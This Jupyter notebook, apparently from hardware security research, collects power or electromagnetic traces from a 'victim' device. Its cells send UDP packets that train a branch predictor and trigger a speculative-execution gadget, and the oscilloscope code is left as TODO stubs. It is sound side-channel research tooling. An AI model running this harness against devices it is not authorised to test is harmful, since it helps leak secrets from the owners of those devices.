In [ ]:
import h5py
import matplotlib.pyplot as plt
import numpy as np
import os
import paramiko
import pickle
import scipy as sp
import socket
import struct
import sys
import time

from datetime import datetime
from random import randrange
from tqdm.notebook import tqdm

Note that this document only provides the basic structure to interface with the gadgets. To collect the traces, add the code to interface with your scope at the places marked `TODO`.

In [ ]:
# Add the IP address of your target here
VICTIM_IP = "IP" 

In [ ]:
client_socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
client_socket.settimeout(5)

addr_gagdet = (VICTIM_IP, 10000)

def access_gadget(index: int):   
    message = struct.pack("<I", index)
    
    client_socket.sendto(message, addr_gagdet)
    data, _ = client_socket.recvfrom(1024)
    
    # Server should return the same message
    assert message == data

In [ ]:
def train(nb_training_packets=5):
    for _ in range(nb_training_packets):
        access_gadget(2)     # bit 2 evaluates to 1
        # access_gadget(0)   # bit 0 evaluates to 0

In [ ]:
class IndexGenerator():
    def __init__(self, start, end=None, random=False, repeat=None):
        self.random = random
        
        if random:
            assert end is not None
            self.end = end
            self.repeat = repeat
            self.prev = None
        else:
            assert end is None
            assert repeat is not None
            self.repeat = repeat
            
        self.start = start
        self.i = start
        self.rep = 0
            
    def __next__(self):
        if self.random:
            if self.rep >= self.repeat or self.prev is None:
                self.prev = randrange(self.start, self.end)
                self.rep = 0
            self.rep += 1
            return self.prev
        else:
            if self.rep >= self.repeat:
                self.rep = 0
                self.i += 1

            self.rep += 1

            return self.i
    
    def reset_frame(self, framesize):
        if not self.random:
            nbreturned = (self.i - self.start) * self.repeat + self.rep

            print(nbreturned)

            nbresume = (nbreturned // framesize) * framesize
            nbresume = nbresume if nbresume < nbreturned else nbresume - framesize

            self.i = nbresume // self.repeat + self.start
            self.rep = nbresume % self.repeat

In [ ]:
def acquireFrame(index_generator, nb_training_packets = 5, framesize=4096):
    global traces_i
    
    # TODO: Add the code to start the capture of a frame on your scope
    # scope.start_frame(framesize)
    
    inputs = np.zeros((framesize), dtype='uint32')
    
    for i in tqdm(range(framesize), leave=False, desc="Collecting traces"):  
        # Train the branch predictor
        train(nb_training_packets)
        
        # Access the gadget
        ind = next(index_generator)
        access_gadget(ind)
        inputs[i] = ind
        
    time.sleep(1)

    # TODO: Add the code to stop the capture of a frame and read out the traces
    # traces = scope.get_traces()
    
    s = slice(traces_i, traces_i+framesize)
    tracesDset[s] = traces
    inputsDset[s] = inputs
        
    traces_i += framesize  

In [ ]:
def collect_traces(nbtraces, index_generator, nb_training_packets=5, framesize=4096):
    # global scope

    # TODO: connect to your scope
    # scope = Scope()

    nFrames = nbtraces // framesize

    k = 0
    pbar = tqdm(total = nFrames, initial=k, desc="Collecting frames", leave=False)

    while k < nFrames:
        # Collecting traces
        acquireFrame(index_generator, nb_training_packets=nb_training_packets)  

        k+=1
        pbar.update(1)
        

In [ ]:
def create_new_file(filename, ntraces):
    global tracesDset, inputsDset, traces_i
    experiment = "data"
    
    f = h5py.File(filename, 'x', libver='latest')

    # create a new group with the name defined by experiment and add some datasets to it
    expg = f.create_group(experiment)

    tracesDset = expg.create_dataset("traces", (ntraces, 25000), dtype='uint8')
    inputsDset = expg.create_dataset("inputs", (ntraces,), dtype='uint32')

    traces_i = 0
    
    return f

## Collecting traces

We now collect the traces from the target device. Before running this cell, first start one of the POCs on the target device.

In [ ]:
nbtraces = 4096*4

t0 = time.perf_counter_ns()

# Create a new file that will contain the traces
filename = "/tmp/traces.hdf5"
f = create_new_file(filename, nbtraces)  

# Collect the traces
index_generator = IndexGenerator(start=5*8, end=37*8, random=True, repeat = 1)
collect_traces(nbtraces, index_generator, nb_training_packets=5)

f.close()

t1 = time.perf_counter_ns()

print(f"Getting traces: {(t1 - t0)/10**9} s")